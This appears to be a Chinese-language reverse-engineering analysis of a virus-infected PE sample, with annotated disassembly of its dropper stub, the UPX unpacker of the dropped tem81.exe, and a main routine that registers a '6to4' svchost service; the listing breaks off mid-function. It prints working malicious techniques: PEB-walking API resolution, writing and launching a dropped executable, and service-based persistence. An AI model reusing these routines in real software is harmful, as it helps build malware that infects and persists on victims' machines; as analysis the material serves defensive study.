标准pe格式带病毒样本分析。
样本执行的过程中会释放出tem81.exe,tem81.exe文件则会创建一个系统服务,为系统服务释放一个支持该服务的6to4.dll文件。
样本的汇编代码分析:
..:0040E000 call $+5 ;
..:0040E000 ;
..:0040E005 pop ebx ; ebx获得一个偏移
..:0040E005 ;
..:0040E006 sub ebx, 400205h ; ebx=偏移-400205h
..:0040E006 ;
..:0040E00C mov edi, large fs:30h ; 把段fs加30的地址是指向peb结构的地址
..:0040E013 mov edi, [edi+0Ch] ; peb偏移c就是peb——ldrdata结构
..:0040E016 mov edi, [edi+1Ch] ; PEB_LDR_DATA的1c处是模块加载顺序列表地址
..:0040E019 mov edi, [edi] ; 获取这个LIST_ENTRY列表
..:0040E01B mov edi, [edi+8] ; 列表加载的第一个是ntdll,第二个是kernel32.dll,一个LIST_ENTRY得大小是8
..:0040E01E mov [ebx+4003C2h], edi ; 把kernel32.dll的地址存储在ebx+4003c2h处
..:0040E024 mov esi, edi ; 把刚出的kernel32地址给esi
..:0040E026 add esi, [esi+3Ch] ; 在kernel32上加3c做地址取数据给esi
..:0040E029 mov esi, [esi+78h] ; 把输出表的相对地址地址赋给esi
..:0040E02C add esi, edi ; 输出表相对地址加上基址得输出表的地址
..:0040E02E push esi ; 压入输出表的地址
..:0040E02F mov ebp, [esi+18h] ; 把有名函数的总数赋给ebp
..:0040E032 mov esi, [esi+20h] ; 把导出函数名数组的相对地址给esi
..:0040E035 add esi, edi ; 导出函数名地址加上基址
..:0040E037 xor edx, edx ; 计数器清零
..:0040E039
..:0040E039 loc_40E039: ; CODE XREF: start+5Ej
..:0040E039 push esi ; 将导出函数名数组压入栈
..:0040E03A mov edi, [esi] ; 取出第一个函数名地址
..:0040E03C add edi, [ebx+4003C2h] ; 加上kennel32的地址就是函数名的真正地址
..:0040E042 lea esi, [ebx+400387h] ; getprocaddress字符的地址
..:0040E048 mov ecx, 0Fh ; 计数器设为15
..:0040E04D repe cmpsb
..:0040E04F jnz short loc_40E057 ; 如果不相等就跳转
..:0040E051 pop esi ; 函数名数组出栈给esi
..:0040E052 mov edx, esi ; 函数名数组又给edx
..:0040E054 pop esi ; 输出表地址出栈给esi
..:0040E055 jmp short loc_40E068 ; 跳转
..:0040E057 ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
..:0040E057
..:0040E057 loc_40E057: ; CODE XREF: start+4Fj
..:0040E057 pop esi ; 不想等函数名数组出栈给esi
..:0040E058 add esi, 4 ; 函数名数组指针指向下一个函数名
..:0040E05B inc edx ; 计数器加一
..:0040E05C cmp edx, ebp ; 判断计数器有没有达到有名函数的总数
..:0040E05E jb short loc_40E039 ; 没有就再循环查找
..:0040E060 sub esp, 4 ; 达到了总数还没有找到,平衡堆栈
..:0040E063 jmp loc_40E182 ; 跳转
..:0040E068 ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
..:0040E068
..:0040E068 loc_40E068: ; CODE XREF: start+55j
..:0040E068 sub edx, [esi+20h] ; 找到了,输出表的20处是函数名数组相对地址,
..:0040E06B mov eax, [ebx+4003C2h] ; kennel32的地址的地址给eax
..:0040E071 sub edx, eax ; 减去kennel32的地址就是kernel32的基址
..:0040E073 shr edx, 1 ; 乘以2
..:0040E075 add edx, [esi+24h] ; 基址加上名字数组序列号相对地址就是数组序列号的绝对地址
..:0040E078 add edx, eax ; 再加上重定位地址,就是序列号数组的真地址
..:0040E07A movzx eax, word ptr [edx] ; 取得序列号数组
..:0040E07D shl eax, 2 ; 乘以4
..:0040E080 add eax, [esi+1Ch] ; 加上存函数地址数组的相对地址
..:0040E083 add eax, [ebx+4003C2h] ; 加上重定位地址就是真正的存函数地址的地址
..:0040E089 mov eax, [eax] ; 取得函数地址
..:0040E08B add eax, [ebx+4003C2h] ; 加上这个重定位地址就是真正的地址
..:0040E091 mov edi, eax ; 获得了getprocadress的调用地址
..:0040E091 ;
..:0040E093 mov ebp, esp ; 当前的栈顶当栈底
..:0040E095 mov edx, [ebx+4003C2h]
..:0040E09B lea eax, [ebx+400396h]
..:0040E0A1 push eax
..:0040E0A2 push edx
..:0040E0A3 call edi ; 取 "GetTempPathA"的地址
..:0040E0A3 ;
..:0040E0A5 sub esp, 104h
..:0040E0AB push esp
..:0040E0AC push 104h
..:0040E0B1 call eax ; 调用kernel32.GetTempPathA,取临时文件的路径
..:0040E0B1 ;
..:0040E0B1 ;
..:0040E0B3 lea eax, [ebx+4003A3h]
..:0040E0B9 push eax
..:0040E0BA mov edx, [ebx+4003C2h]
..:0040E0C0 push edx
..:0040E0C1 call edi ; 获得lstrcatA函数
..:0040E0C1 ;
..:0040E0C3 lea ecx, [ebx+4003ACh] ; tem81.exe的字符串地址
..:0040E0C9 push ecx
..:0040E0CA mov ecx, esp
..:0040E0CC add ecx, 4
..:0040E0CF push ecx ; 将GetTempPathA返回的路径字符串压入堆栈
..:0040E0CF ;
..:0040E0D0 call eax ; 路径与 tem81.exe 组合
..:0040E0D0 ;
..:0040E0D2 lea eax, [ebx+4003B6h] ; CreateFileA字符串地址
..:0040E0D8 push eax
..:0040E0D9 mov edx, [ebx+4003C2h]
..:0040E0DF push edx
..:0040E0E0 call edi ; 取 "CreateFileA"的地址
..:0040E0E0 ;
..:0040E0E2 mov ecx, esp ; 创建的文件名
..:0040E0E4 push 0
..:0040E0E6 push 80h
..:0040E0EB push 2
..:0040E0ED push 0
..:0040E0EF push 0
..:0040E0F1 push 0C0000000h
..:0040E0F6 push ecx
..:0040E0F7 call eax ; 创建文件 "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tem81.exe
..:0040E0F7 ;
..:0040E0F9 mov esi, eax ; 将文件的句柄存在esi中
..:0040E0FB lea ecx, [ebx+4003EDh] ; WriteFile字符串的地址
..:0040E101 push ecx
..:0040E102 push ecx
..:0040E103 mov edx, [ebx+4003C2h]
..:0040E109 push edx
..:0040E10A call edi ; 获得WriteFile函数
..:0040E10C pop ecx
..:0040E10D push 0
..:0040E10F push ecx ; 用于实际写入区域的字节数
..:0040E110 add ecx, 0Ah
..:0040E113 mov edx, [ecx]
..:0040E115 push edx ; 要写的字节数
..:0040E116 push ecx ; 数据缓冲区的指针
..:0040E117 mov edx, 905A4Dh
..:0040E11C mov [ecx], edx
..:0040E11E push esi ; 文件句柄
..:0040E11F call eax ; 将内容写入文件,此时堆栈0012FEAC 00000044 文件句柄
..:0040E11F ; 0012FEB0 0040E1F7 缓冲区,存放要写入的内容
..:0040E11F ; 0012FEB4 00005C00 写入的大小
..:0040E11F ;
..:0040E121 lea eax, [ebx+4003D5h] ; CloseHandle
..:0040E127 push eax
..:0040E128 mov edx, [ebx+4003C2h]
..:0040E12E push edx
..:0040E12F call edi ; 取得CloseHandle函数
..:0040E131 push esi ; 关闭打开的文件
..:0040E132 call eax
..:0040E134 lea eax, [ebx+4003C6h]
..:0040E13A push eax
..:0040E13B mov edx, [ebx+4003C2h]
..:0040E141 push edx
..:0040E142 call edi ; 取"CreateProcessA"的地址
..:0040E142 ;
..:0040E144 sub esp, 44h
..:0040E147 mov edx, esp
..:0040E149 mov esi, 0
..:0040E14E mov ecx, 11h
..:0040E153
..:0040E153 loc_40E153: ; CODE XREF: start+158j
..:0040E153 mov [edx], esi
..:0040E155 add edx, 4
..:0040E158 loop loc_40E153 ; 0040E153栈顶清0,构造CreateProcessA所需的运行环境
..:0040E158 ;
..:0040E15A mov edx, 44h
..:0040E15F mov [esp+0], edx
..:0040E162 sub esp, 10h
..:0040E165 mov edx, esp
..:0040E167 push esp ; 返回的句柄等信息
..:0040E168 add edx, 10h
..:0040E16B push edx ; 新进程的窗口
..:0040E16C push 0 ; 使用当前目录
..:0040E16E push 0 ; 环境变量
..:0040E170 push 0 ; 优先级
..:0040E172 push 0 ; 可否继承
..:0040E174 push 0 ; 线程安全性
..:0040E176 push 0 ; 进程安全性
..:0040E178 push 0 ; 要传递的执行模块参数
..:0040E17A add edx, 44h
..:0040E17D push edx ; 可执行文件的名称
..:0040E17E call eax ; 运行刚生成的那个文件
..:0040E180 mov esp, ebp ; 跳向原始的oep
..:0040E182
..:0040E182 loc_40E182: ; CODE XREF: start+63j
..:0040E182 jmp loc_4010CC
..:0040E182 start endp
样本在C:\Documents and Settings\Administrator\Local Settings\Temp目录下释放了一个tem81.exe文件,再样本中就存好了temp81.exepe文件
格式的数据,样本通过api,创建文件,再将这些pe格式的数据写入到tem81.exe文件中。样再创建新进程启动这个tem81.exe。
释放出来了的tem81.exe文件时通过upx加密的,upx壳有三个区段,upx0,upx1和rvrs。upx壳负责将upx1中的真正的程序解压到upx0中,再重新
地位输入表中输入函数的地址,再跳到upx0中的真正程序中去执行。具体分析:
tem81中upx壳的分析:
緮褀t烈w?
UPX1:0040B080 public start
UPX1:0040B080 start proc near
UPX1:0040B080
UPX1:0040B080 var_AC = dword ptr -0ACh
UPX1:0040B080
UPX1:0040B080 pusha ; upx壳:
UPX1:0040B080 ; 寄存器入栈
UPX1:0040B081 mov esi, offset dword_406000 ; upx1的起始地址406000的偏移地址给esi
UPX1:0040B086 lea edi, [esi-5000h] ; 这个地址减去upx0的大小就是401000
UPX1:0040B08C push edi ; upx0的地址压入
UPX1:0040B08D jmp short getfirstdword
UPX1:0040B08D ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
UPX1:0040B08F align 10h
UPX1:0040B090
UPX1:0040B090 kaowhile: ; CODE XREF: start:loc_40B0A1j
UPX1:0040B090 mov al, [esi] ; 把upx1的第二双字最低字节取出
UPX1:0040B092 inc esi ; upx1的指针加一
UPX1:0040B093 mov [edi], al ; 把upx1第二双字最低字节拷贝到upx0第一字节中去
UPX1:0040B095 inc edi ; upx0指针加一
UPX1:0040B096
UPX1:0040B096 inkaowhile: ; CODE XREF: start+AEj
UPX1:0040B096 ; start+C5j
UPX1:0040B096 add ebx, ebx ; upx的第一双字ebx再左移一位
UPX1:0040B098 jnz short loc_40B0A1 ; 如果结果不是零就跳转
UPX1:0040B09A
UPX1:0040B09A getfirstdword: ; CODE XREF: start+Dj
UPX1:0040B09A mov ebx, [esi] ; 把upx1的第一双字取出ebx
UPX1:0040B09C sub esi, 0FFFFFFFCh ; upx1偏移地址减去-4就是加4指向第二个双字
UPX1:0040B09F adc ebx, ebx ; 第一双字ebx*2+1,左移一位,用进位填充
UPX1:0040B0A1
UPX1:0040B0A1 loc_40B0A1: ; CODE XREF: start+18j
UPX1:0040B0A1 jb short kaowhile ; 结果益处,大于32位则跳转如果2*ebx+1大于2的32次方继续下个循环
UPX1:0040B0A1 ; 直到ebx的一位为零时停止拷贝
UPX1:0040B0A3 mov eax, 1 ; 将upx1的第3字节后面的一段数据给upx0,upx1的第一个双字确定拷贝长度
UPX1:0040B0A3 ; upx0的数据是:
UPX1:0040B0A3 ; 00401000 55 8B EC 81 EC 90 0D 00 00 FF 15 DC 20 40 00 6A U嬱侅?..?@.j
UPX1:0040B0A3 ;
UPX1:0040B0A3 ; kaowhile循环结束
UPX1:0040B0A3 ; 初始化eax为1
UPX1:0040B0A8
UPX1:0040B0A8 secowhile: ; CODE XREF: start+37j
UPX1:0040B0A8 ; start+42j
UPX1:0040B0A8 add ebx, ebx ; ebx再移位,把零位后面的那位取出
UPX1:0040B0AA jnz short loc_40B0B3 ; 如果ebx移位后不是零跳转
UPX1:0040B0AC mov ebx, [esi] ; 如果ebx移位后是零,则再从upx1的当前指针取一个双字数据当ebx
UPX1:0040B0AE sub esi, 0FFFFFFFCh ; 再移动upx1的指针
UPX1:0040B0B1 adc ebx, ebx ; 取的该双字后左移一位,用进位填充
UPX1:0040B0B3
UPX1:0040B0B3 loc_40B0B3: ; CODE XREF: start+2Aj
UPX1:0040B0B3 adc eax, eax ; 将计数器eax左移一位,最后一位用ebx移出来的最高位填充
UPX1:0040B0B5 add ebx, ebx ; ebx再左移一位
UPX1:0040B0B7 jnb short secowhile ; 移出那位是零就跳转,进入下次循环
UPX1:0040B0B9 jnz short loc_40B0C4 ; ebx移位后不是零就跳转
UPX1:0040B0BB mov ebx, [esi] ; 如果ebx移位后是零就再向upx1取一个双字
UPX1:0040B0BD sub esi, 0FFFFFFFCh
UPX1:0040B0C0 adc ebx, ebx
UPX1:0040B0C2 jnb short secowhile ; 取得双字后,左移一位,移出位是0就跳转,进入下一次循环
UPX1:0040B0C4
UPX1:0040B0C4 loc_40B0C4: ; CODE XREF: start+39j
UPX1:0040B0C4 xor ecx, ecx ; ecx清零
UPX1:0040B0C6 sub eax, 3 ; eax=eax-3
UPX1:0040B0C9 jb short loc_40B0D8 ; 如果eax小于3就跳转
UPX1:0040B0CB shl eax, 8 ; 如果eax>=3,eax=(eax-3)再左移八位
UPX1:0040B0CE mov al, [esi] ; 继续从upx1刚才拷到得地方再拷一字节给eax的第一字节
UPX1:0040B0D0 inc esi ; upx1的指针再加一
UPX1:0040B0D1 xor eax, 0FFFFFFFFh ; 最低字节是upx里拷贝的数据的eax按位求非
UPX1:0040B0D4 jz short endkaowhile ; 如果结果等于零跳转,不再进入kaowhile
UPX1:0040B0D6 mov ebp, eax ; 把eax运算的结果给ebp栈底,ebp=eax
UPX1:0040B0D8
UPX1:0040B0D8 loc_40B0D8: ; CODE XREF: start+49j
UPX1:0040B0D8 add ebx, ebx ; ebx再左移一位
UPX1:0040B0D8 ;
UPX1:0040B0D8 ;
UPX1:0040B0D8 ;
UPX1:0040B0D8 ; 连续将ebx移出二位,移到ecx的中去
UPX1:0040B0DA jnz short loc_40B0E3 ; 不等于零就跳转
UPX1:0040B0DC mov ebx, [esi] ; 等于零就再向upx1取
UPX1:0040B0DE sub esi, 0FFFFFFFCh
UPX1:0040B0E1 adc ebx, ebx
UPX1:0040B0E3
UPX1:0040B0E3 loc_40B0E3: ; CODE XREF: start+5Aj
UPX1:0040B0E3 adc ecx, ecx ; ecx左移一位,最后一位,用ebx的移出的最高位填充
UPX1:0040B0E5 add ebx, ebx ; ebx再左移一位
UPX1:0040B0E7 jnz short loc_40B0F0 ; 不等于零又跳转
UPX1:0040B0E9 mov ebx, [esi]
UPX1:0040B0EB sub esi, 0FFFFFFFCh
UPX1:0040B0EE adc ebx, ebx
UPX1:0040B0F0
UPX1:0040B0F0 loc_40B0F0: ; CODE XREF: start+67j
UPX1:0040B0F0 adc ecx, ecx ; 计数器ecx移一位,用ebx移出的位填充
UPX1:0040B0F2 jnz short endsecwhile ; 计数器不等于零就跳转
UPX1:0040B0F2 ;
UPX1:0040B0F2 ; 连续移出二位,都不是零就跳转
UPX1:0040B0F4 inc ecx ; 如果ecx是零,那就加一
UPX1:0040B0F5
UPX1:0040B0F5 loc_40B0F5: ; CODE XREF: start+84j
UPX1:0040B0F5 ; start+8Fj
UPX1:0040B0F5 add ebx, ebx ; ebx再左移一位
UPX1:0040B0F7 jnz short loc_40B100 ; 左移一位结果不是零,就跳转
UPX1:0040B0F9 mov ebx, [esi] ; 是零就接着去数据
UPX1:0040B0FB sub esi, 0FFFFFFFCh
UPX1:0040B0FE adc ebx, ebx
UPX1:0040B100
UPX1:0040B100 loc_40B100: ; CODE XREF: start+77j
UPX1:0040B100 adc ecx, ecx ; ecx左移一位,用ebx移出位填充
UPX1:0040B102 add ebx, ebx ; ebx再移一位
UPX1:0040B104 jnb short loc_40B0F5 ; 移出位是零就跳转
UPX1:0040B106 jnz short loc_40B111 ; ebx移一位后不是零就跳转
UPX1:0040B108 mov ebx, [esi] ; 是零就接着取数据
UPX1:0040B10A sub esi, 0FFFFFFFCh
UPX1:0040B10D adc ebx, ebx
UPX1:0040B10F jnb short loc_40B0F5
UPX1:0040B111
UPX1:0040B111 loc_40B111: ; CODE XREF: start+86j
UPX1:0040B111 add ecx, 2 ; ecx=ecx+2
UPX1:0040B114
UPX1:0040B114 endsecwhile: ; CODE XREF: start+72j
UPX1:0040B114 cmp ebp, 0FFFFF300h ; ebp-fffff300
UPX1:0040B11A adc ecx, 1 ; ecx是ebx连续移出的两位,ecx=ecx+1+c
UPX1:0040B11D lea edx, [edi+ebp]
UPX1:0040B120 cmp ebp, 0FFFFFFFCh ; ebp-fffffffc
UPX1:0040B123 jbe short smallebp ; 如果ebp小于等于fffffffc就跳转,跳出secowhile
UPX1:0040B125
UPX1:0040B125 kaoedxtoedi: ; CODE XREF: start+ACj
UPX1:0040B125 mov al, [edx] ; 大于就把upx0的edx地址处的数据给al
UPX1:0040B127 inc edx ; 移动指针
UPX1:0040B128 mov [edi], al ; 把edx的数据给upx0的edi处
UPX1:0040B12A inc edi
UPX1:0040B12B dec ecx ; ecx减一
UPX1:0040B12C jnz short kaoedxtoedi ; ecx减一不等于零跳转
UPX1:0040B12E jmp inkaowhile ; 拷完ecx个字节,继续进入kaowhile循环
UPX1:0040B12E ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
UPX1:0040B133 align 4
UPX1:0040B134
UPX1:0040B134 smallebp: ; CODE XREF: start+A3j
UPX1:0040B134 ; start+C1j
UPX1:0040B134 mov eax, [edx] ; 如果ebp小于fffffffc跳到这里
UPX1:0040B136 add edx, 4
UPX1:0040B139 mov [edi], eax
UPX1:0040B13B add edi, 4
UPX1:0040B13E sub ecx, 4 ; 将edx的四个字节给edi的四个字节
UPX1:0040B141 ja short smallebp ; ecx大于零接着拷贝
UPX1:0040B143 add edi, ecx
UPX1:0040B145 jmp inkaowhile ; 再进入kaowhile循环
UPX1:0040B14A ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
UPX1:0040B14A
UPX1:0040B14A endkaowhile: ; CODE XREF: start+54j
UPX1:0040B14A pop esi ; 拷贝完成时esi是40b07a
UPX1:0040B14A ; edi是40a51a
UPX1:0040B14A ; upx0的起始地址401000出栈给esi
UPX1:0040B14B mov edi, esi ; edi= esi upx0的起始地址
UPX1:0040B14D mov ecx, 2Fh ; ecx = 2fh
UPX1:0040B152
UPX1:0040B152 seache8: ; CODE XREF: start+D9j
UPX1:0040B152 ; start+DEj
UPX1:0040B152 mov al, [edi] ; 取upx0第一个字节
UPX1:0040B154 inc edi ; 移动upx0的指针
UPX1:0040B155 sub al, 0E8h ; al=al-e8第一字节减去e8
UPX1:0040B157
UPX1:0040B157 loc_40B157: ; CODE XREF: start+FCj
UPX1:0040B157 cmp al, 1 ; el-1是否大于零
UPX1:0040B159 ja short seache8 ; al减一大于零就继续循环取upx0的数据
UPX1:0040B15B cmp byte ptr [edi], 2
UPX1:0040B15E jnz short seache8 ; 搜索e8且后面是2的地方
UPX1:0040B160 mov eax, [edi] ; 把这个地址的数据900C0002给eax
UPX1:0040B162 mov bl, [edi+4] ; 再把搜索的eax地址退后4字节的数据给bl
UPX1:0040B165 shr ax, 8 ; ax右移8位
UPX1:0040B169 rol eax, 10h ; eax的高位和地位换
UPX1:0040B16C xchg al, ah ; ax高底位互换变成了00000C90
UPX1:0040B16E sub eax, edi ; eax=eax-edi=FFBFFC4C
UPX1:0040B16E ; eax减去搜索到的地址edi
UPX1:0040B170 sub bl, 0E8h ; bl=bl - e8
UPX1:0040B173 add eax, esi ; eax=eax+esi,ffbffc4c+401000
UPX1:0040B175 mov [edi], eax ; 再吧结果eax给搜索到的edi地址处
UPX1:0040B177 add edi, 5 ; 搜索地址edi=5
UPX1:0040B17A mov al, bl ; 将搜索到的地址退后4字节的数据运减e8后的结果算给al
UPX1:0040B17C loop loc_40B157 ; 找到第2fh个e8 02的书据
UPX1:0040B17E lea edi, [esi+9000h] ; 将upx0的推后9000即40a000地址给edi就是输入表的函数名数组
UPX1:0040B184
UPX1:0040B184 getfunction: ; CODE XREF: start+126j
UPX1:0040B184 mov eax, [edi] ; 取得40a000处的数据d0
UPX1:0040B186 or eax, eax
UPX1:0040B188 jz short loc_40B1C6 ; 如果取得数据eax是零就跳转
UPX1:0040B18A mov ebx, [edi+4] ; 就是输入表的函数地址数组
UPX1:0040B18D lea eax, [eax+esi+0B064h] ; eax=upx0+eax+b064h构造地址upx0地址加上eax加b064h
UPX1:0040B18D ; 就是kernel.dll字符串的地址
UPX1:0040B194 add ebx, esi ; ebx = upx0+ebx
UPX1:0040B196 push eax ; kernel.dll字符串地址进栈
UPX1:0040B197 add edi, 8 ; edi=edi+8 指向40a008地址
UPX1:0040B19A call dword ptr [esi+0B0F0h] ; 调用loadlibrarya函数upx0+b0f0h处函数
UPX1:0040B1A0 xchg eax, ebp ; 用kernel.dll的模块地址eax和ebp互换
UPX1:0040B1A1
UPX1:0040B1A1 loc_40B1A1: ; CODE XREF: start+13Ej
UPX1:0040B1A1 mov al, [edi] ; 把40a008(函数名)的一个字节给al
UPX1:0040B1A3 inc edi ; edi指向下个字节
UPX1:0040B1A4 or al, al
UPX1:0040B1A6 jz short getfunction ; 判断字节al是否为零,为零就接着进入下次搜索
UPX1:0040B1A8 mov ecx, edi ; 函数名的首地址给ecx
UPX1:0040B1AA push edi ; 压入函数名
UPX1:0040B1AB dec eax ; eax减一
UPX1:0040B1AC repne scasb
UPX1:0040B1AE push ebp ; 压入kernel.dll的模块地址
UPX1:0040B1AF call dword ptr [esi+0B0F4h] ; 调用getprocaddress函数
UPX1:0040B1B5 or eax, eax ; 返回值是零就跳转
UPX1:0040B1B7 jz short loc_40B1C0 ; 填完函数输入表,跳出
UPX1:0040B1B9 mov [ebx], eax ; 取得了函数的地址存ebx指定的地址处
UPX1:0040B1BB add ebx, 4
UPX1:0040B1BE jmp short loc_40B1A1
UPX1:0040B1C0 ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
UPX1:0040B1C0
UPX1:0040B1C0 loc_40B1C0: ; CODE XREF: start+137j
UPX1:0040B1C0 call dword ptr [esi+0B104h]
UPX1:0040B1C6
UPX1:0040B1C6 loc_40B1C6: ; CODE XREF: start+108j
UPX1:0040B1C6 mov ebp, [esi+0B0F8h] ; 把virtualproctect函数地址给ebp
UPX1:0040B1CC lea edi, [esi-1000h] ; edi=400000
UPX1:0040B1D2 mov ebx, 1000h
UPX1:0040B1D7 push eax
UPX1:0040B1D8 push esp
UPX1:0040B1D9 push 4
UPX1:0040B1DB push ebx
UPX1:0040B1DC push edi
UPX1:0040B1DD call ebp ; 调用virtualproctect函数
UPX1:0040B1DF lea eax, [edi+1EFh]
UPX1:0040B1E5 and byte ptr [eax], 7Fh
UPX1:0040B1E8 and byte ptr [eax+28h], 7Fh
UPX1:0040B1EC pop eax
UPX1:0040B1ED push eax
UPX1:0040B1EE push esp
UPX1:0040B1EF push eax
UPX1:0040B1F0 push ebx
UPX1:0040B1F1 push edi
UPX1:0040B1F2 call ebp ; 调用virtualproctect函数
UPX1:0040B1F4 pop eax
UPX1:0040B1F5 popa
UPX1:0040B1F6 lea eax, [esp+2Ch+var_AC]
UPX1:0040B1FA
UPX1:0040B1FA loc_40B1FA: ; CODE XREF: start+17Ej
UPX1:0040B1FA push 0
UPX1:0040B1FC cmp esp, eax
UPX1:0040B1FE jnz short loc_40B1FA
UPX1:0040B200 sub esp, 0FFFFFF80h
UPX1:0040B203 jmp near ptr dword_401000 ; upx壳结束,跳到主程序
UPX1:0040B203 start endp
UPX1:0040B203
tem81的主程序里面创建一个6to4服务,该服务在svchost下,6to4支持的动态链接库是6to4.dll。再开启这个服务。
主程序的分析:
00401000 55 push ebp ; 壳中的程序
00401001 8BEC mov ebp, esp
00401003 81EC 900D0000 sub esp, 0D90
00401009 FF15 DC204000 call dword ptr [4020DC] ; USER32.GetInputState
0040100F 6A 00 push 0
00401011 6A 00 push 0
00401013 6A 00 push 0 ; 获得当前线程的id
00401015 FF15 80204000 call dword ptr [402080] ; kernel32.GetCurrentThreadId
0040101B 50 push eax ; 向当前线程发送一个wm_null消息
0040101C FF15 E4204000 call dword ptr [4020E4] ; USER32.PostThreadMessageA
00401022 6A 00 push 0
00401024 6A 00 push 0
00401026 6A 00 push 0
00401028 8D85 3CFEFFFF lea eax, dword ptr [ebp-1C4] ; pmessage(ebp-1c4)结构地址指针给eax
0040102E 50 push eax ; 取得消息
0040102F FF15 E8204000 call dword ptr [4020E8] ; USER32.GetMessageA
00401035 68 04010000 push 104 ; 大小
0040103A 6A 00 push 0
0040103C 8D85 58FEFFFF lea eax, dword ptr [ebp-1A8]
00401042 50 push eax ; 把psubstr地址压入,设置该内存的数据
00401043 E8 4C0C0000 call 00401C94 ; jmp 到 MSVCRT.memset
00401048 83C4 0C add esp, 0C ; 外部平衡堆栈
0040104B 8D85 58FEFFFF lea eax, dword ptr [ebp-1A8] ; 取得刚清空的内存的地址psubstr
00401051 50 push eax
00401052 E8 A8060000 call 004016FF ; 调用fcheckfile函数,一个参数是存文件路径空格以后的字符
00401057 8945 E8 mov dword ptr [ebp-18], eax ; isdelfilecevent是否删除文件和创建了事件
0040105A 68 80000000 push 80
0040105F 6A 00 push 0
00401061 8D85 60FFFFFF lea eax, dword ptr [ebp-A0] ; 清空ebp-a0
00401067 50 push eax
00401068 E8 270C0000 call 00401C94 ; jmp 到 MSVCRT.memset
0040106D 83C4 0C add esp, 0C ; 外部平衡堆栈
00401070 68 80000000 push 80
00401075 6A 00 push 0
00401077 8D85 B8FDFFFF lea eax, dword ptr [ebp-248] ; ebp-248内存也清零
0040107D 50 push eax
0040107E E8 110C0000 call 00401C94 ; jmp 到 MSVCRT.memset
00401083 83C4 0C add esp, 0C ; 外部平衡堆栈
00401086 68 3F000F00 push 0F003F ; 访问类型
0040108B 6A 00 push 0 ; 数据库名称
0040108D 6A 00 push 0 ; 机器名称,建立连接到服务控制管理器并打开数据库
0040108F FF15 24204000 call dword ptr [402024] ; ADVAPI32.OpenSCManagerA
00401095 8945 F8 mov dword ptr [ebp-8], eax ; hdataserver数据库德句柄
00401098 8365 E4 00 and dword ptr [ebp-1C], 0 ; ebp-1c清零
0040109C 8D45 F0 lea eax, dword ptr [ebp-10] ; ebp-10放hreg注册表取得ebp-10变量的地址
0040109F 50 push eax ; 返回结果
004010A0 6A 01 push 1 ; 操作
004010A2 6A 00 push 0 ; 选项
004010A4 68 88214000 push 00402188 ; ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost"
004010A9 68 02000080 push 80000002 ; 主键,打开svchost注册表存在hreg变量处(ebp-10)
004010AE FF15 1C204000 call dword ptr [40201C] ; ADVAPI32.RegOpenKeyExA
004010B4 68 00040000 push 400
004010B9 6A 00 push 0
004010BB 8D85 B0F9FFFF lea eax, dword ptr [ebp-650] ; 清零ebp-650处的数据
004010C1 50 push eax
004010C2 E8 CD0B0000 call 00401C94 ; jmp 到 MSVCRT.memset
004010C7 83C4 0C add esp, 0C ; 平衡堆栈
004010CA C745 F4 0004000>mov dword ptr [ebp-C], 400 ; 给ebp-c赋值400
004010D1 8D45 F4 lea eax, dword ptr [ebp-C]
004010D4 50 push eax ; pbufsize(ebp-c)地址进栈
004010D5 8D85 B0F9FFFF lea eax, dword ptr [ebp-650]
004010DB 50 push eax ; buffer(ebp-650)地址进栈
004010DC 8D45 EC lea eax, dword ptr [ebp-14] ; ebp-14地址进栈
004010DF 50 push eax ; pvaluetype
004010E0 6A 00 push 0 ; reserved
004010E2 68 C0214000 push 004021C0 ; ValueName = "netsvcs"
004010E7 FF75 F0 push dword ptr [ebp-10] ; 压入打开的注册表句柄,查询注册表netsvcs的值
004010EA FF15 08204000 call dword ptr [402008] ; ADVAPI32.RegQueryValueExA
004010F0 FF75 F0 push dword ptr [ebp-10] ; 关闭注册表句柄hreg
004010F3 FF15 10204000 call dword ptr [402010] ; ADVAPI32.RegCloseKey
004010F9 837D E8 01 cmp dword ptr [ebp-18], 1 ; isdelfilecevent(ebp-18)是否删除文件及创建事件,没有就跳转
004010FD 75 7D jnz short 0040117C
004010FF 8D85 60FFFFFF lea eax, dword ptr [ebp-A0]
00401105 50 push eax
00401106 8D85 58FEFFFF lea eax, dword ptr [ebp-1A8] ; 空格后的字符串ebp-1a8
0040110C 50 push eax
0040110D 8D85 B0F9FFFF lea eax, dword ptr [ebp-650] ; netsvcs注册表的值
00401113 50 push eax
00401114 E8 F0090000 call 00401B09 ; 调用函数openservice(pnetsvcs,psubspace,pz)py是ebp-1a8空格后的字符
00401119 68 10000100 push 10010 ; UNICODE "ALLUSERSPROFILE=C:\Documents and Settings\All Users"
0040111E 8D85 60FFFFFF lea eax, dword ptr [ebp-A0] ; pz
00401124 50 push eax ; 打开C:\Documents and Settings\All Users"
00401125 FF75 F8 push dword ptr [ebp-8] ; hdataserver数据库德句柄
00401128 FF15 14204000 call dword ptr [402014] ; ADVAPI32.OpenServiceA
0040112E 8945 E4 mov dword ptr [ebp-1C], eax ; hservice(ebp-1c)
00401131 8D85 58FEFFFF lea eax, dword ptr [ebp-1A8]
00401137 50 push eax
00401138 E8 EC070000 call 00401929 ; create(psubstr)
0040113D 83F8 01 cmp eax, 1
00401140 75 28 jnz short 0040116A ; 创建文件成功
00401142 6A 00 push 0
00401144 6A 00 push 0
00401146 FF75 E4 push dword ptr [ebp-1C] ; 开启服务
00401149 FF15 00204000 call dword ptr [402000] ; ADVAPI32.StartServiceA
0040114F FF75 E4 push dword ptr [ebp-1C] ; 关闭句柄
00401152 FF15 30204000 call dword ptr [402030] ; ADVAPI32.CloseServiceHandle
00401158 FF75 F8 push dword ptr [ebp-8]
